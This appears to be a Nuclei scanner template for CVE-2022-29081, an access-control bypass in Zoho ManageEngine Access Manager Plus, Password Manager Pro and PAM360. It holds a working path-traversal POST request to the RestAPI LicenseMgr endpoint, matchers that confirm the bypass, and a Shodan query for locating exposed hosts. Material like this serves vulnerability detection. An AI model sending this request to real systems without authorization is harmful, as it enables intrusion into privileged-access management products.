Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few Rest API URLs (for SSOutAction. SSLAction. LicenseMgr. GetProductDetails. GetDashboard. FetchEvents. and Synchronize) via the ../RestAPI substring.
PoC代码[已公开]
id: CVE-2022-29081
info:
name: Zoho ManageEngine - Access Control Bypass
author: 0xanis
severity: critical
description: |
Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few Rest API URLs (for SSOutAction. SSLAction. LicenseMgr. GetProductDetails. GetDashboard. FetchEvents. and Synchronize) via the ../RestAPI substring.
impact: |
Attackers can bypass access controls on REST API endpoints, potentially leading to unauthorized data access or manipulation.
remediation: |
Update to the latest versions of Access Manager Plus, Password Manager Pro, and PAM360 that address this issue.
reference:
- https://www.tenable.com/security/research/tra-2022-14
- https://www.manageengine.com/privileged-session-management/advisory/cve-2022-29081.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-29081
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29081
epss-score: 0.84708
epss-percentile: 0.99421
cwe-id: CWE-22
metadata:
shodan-query: http.title:"manageengine"
verified: true
max-request: 1
tags: cve,cve2022,zoho,manageengine,auth-bypass,vkev
http:
- raw:
- |
POST /x/..//RestAPI/LicenseMgr HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
operation=getLicenseDetails
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"BUILD_NO"'
- '"LICENSE_TO"'
- '"VERSION"'
- '"PRODUCT_NAME"'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100a76f099df1e418132573a12e3708968849d6a4f77e21ad8705e4f969b515c3070221009229448de3e7476f9a29955318053becfdaec0649994b8e77e091ea0bce4ebb2:922c64590222798bb761d5b6d8e72950